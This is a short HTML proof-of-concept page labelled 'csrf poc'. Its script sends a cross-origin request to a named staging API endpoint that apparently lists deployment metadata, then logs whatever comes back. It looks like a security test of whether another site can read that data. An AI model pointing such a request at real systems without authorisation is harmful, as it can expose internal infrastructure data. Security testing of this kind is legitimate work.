<!DOCTYPE html> 
<html> 
    <head> 
        <title>csrf poc</title> 
    </head> 
    <body> 
    
    test page

        <script>
            console.log("csrf poc")
            function reqListener () {
              console.log(this.responseText);
            }
            var x = new XMLHttpRequest();
            x.addEventListener("load", reqListener);
            x.open("GET","https://veteran.apps-staging.va.gov/k8/api/v1/deployment/sqa?filterBy=name,metadata");
            x.send(); 
        </script>
    </body> 
</html>                     
